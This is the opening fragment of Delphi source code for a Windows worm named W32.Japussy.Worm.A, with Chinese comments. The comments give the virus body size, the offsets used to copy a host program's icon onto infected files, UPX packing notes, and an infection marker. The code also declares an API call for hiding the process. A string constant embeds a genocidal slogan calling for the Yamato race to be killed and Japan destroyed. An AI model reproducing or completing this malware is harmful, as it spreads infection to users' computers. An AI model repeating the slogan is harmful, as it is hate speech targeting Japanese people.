program Japussy; uses Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry}; const HeaderSize = 82432; //病毒体的大小 IconOffset = $12EB8; //PE文件主图标的偏移量 //在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同 //查找2800000020的十六进制字符串可以找到主图标的偏移量 { HeaderSize = 38912; //Upx压缩过病毒体的大小 IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量 //Upx 1.24W 用法: upx -9 --8086 Japussy.exe } IconSize = $2E8; //PE文件主图标的大小--744字节 IconTail = IconOffset + IconSize; //PE文件主图标的尾部 ID = $44444444; //感染标记 //垃圾码,以备写入 Catchword = 'If a race need to be killed out, it must be Yamato. ' + 'If a country need to be destroyed, it must be Japan! ' + '*** W32.Japussy.Worm.A ***'; {$R *.RES} function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external 'Kernel32.dll'; //